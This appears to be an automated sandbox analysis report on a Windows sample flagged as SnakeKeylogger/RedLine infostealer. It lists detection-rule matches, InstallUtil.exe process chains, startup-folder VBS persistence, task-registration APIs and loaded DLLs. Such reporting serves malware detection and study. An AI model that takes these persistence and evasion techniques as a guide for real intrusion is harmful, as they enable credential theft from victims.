Source: 5.2.InstallUtil.exe.2310000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.InstallUtil.exe.2310000.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.InstallUtil.exe.2310000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.InstallUtil.exe.221fece.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.InstallUtil.exe.221fece.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.InstallUtil.exe.221fece.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000005.00000002.3510377398.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.3510377398.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.3510377398.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.3504497907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.3520348253.0000000005980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.3520348253.0000000005980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.3520348253.0000000005980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000005.00000002.3507858654.00000000021DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: InstallUtil.exe PID: 6420, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: InstallUtil.exe PID: 6952, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: SKM_72059114803.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: InnerException.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SKM_72059114803.exe, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: SKM_72059114803.exe, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: SKM_72059114803.exe, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.InstallUtil.exe.5980000.1.raw.unpack, ---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.InstallUtil.exe.5980000.1.raw.unpack, m-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.InstallUtil.exe.5980000.1.raw.unpack, m-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SKM_72059114803.exe.5ef0000.6.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.SKM_72059114803.exe.5ef0000.6.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.SKM_72059114803.exe.5ef0000.6.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.SKM_72059114803.exe.5ef0000.6.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 2.2.InstallUtil.exe.5980000.1.raw.unpack, ---.cs Base64 encoded string: 'XMuSFETbyBYN0D1DqZrIcmBzWlHWxdzJgpT72N7GUlJXlFUAqs1G5B4ARkzSCEaD'
Source: 0.2.SKM_72059114803.exe.5ef0000.6.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.SKM_72059114803.exe.5ef0000.6.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SKM_72059114803.exe.5ef0000.6.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.SKM_72059114803.exe.5ef0000.6.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.SKM_72059114803.exe.5ef0000.6.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.SKM_72059114803.exe.5ef0000.6.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@8/3@4/4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 2_2_004019F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 2_2_004019F0
Source: C:\Users\user\Desktop\SKM_72059114803.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: NULL
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs"
Source: SKM_72059114803.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SKM_72059114803.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: InstallUtil.exe, 00000002.00000002.3511344558.00000000038A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3511344558.0000000003859000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3511344558.0000000003869000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3511344558.0000000003877000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3511344558.000000000389C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3512080381.0000000002839000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3512080381.0000000002829000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3512080381.000000000286C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3512080381.0000000002878000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3512080381.0000000002847000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SKM_72059114803.exe Virustotal: Detection: 69%
Source: SKM_72059114803.exe ReversingLabs: Detection: 75%
Source: C:\Users\user\Desktop\SKM_72059114803.exe File read: C:\Users\user\Desktop\SKM_72059114803.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SKM_72059114803.exe "C:\Users\user\Desktop\SKM_72059114803.exe"
Source: C:\Users\user\Desktop\SKM_72059114803.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\InnerException.exe "C:\Users\user\AppData\Roaming\InnerException.exe"
Source: C:\Users\user\AppData\Roaming\InnerException.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\SKM_72059114803.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\InnerException.exe "C:\Users\user\AppData\Roaming\InnerException.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SKM_72059114803.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\InnerException.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasadhlp.dll Jump to behavior
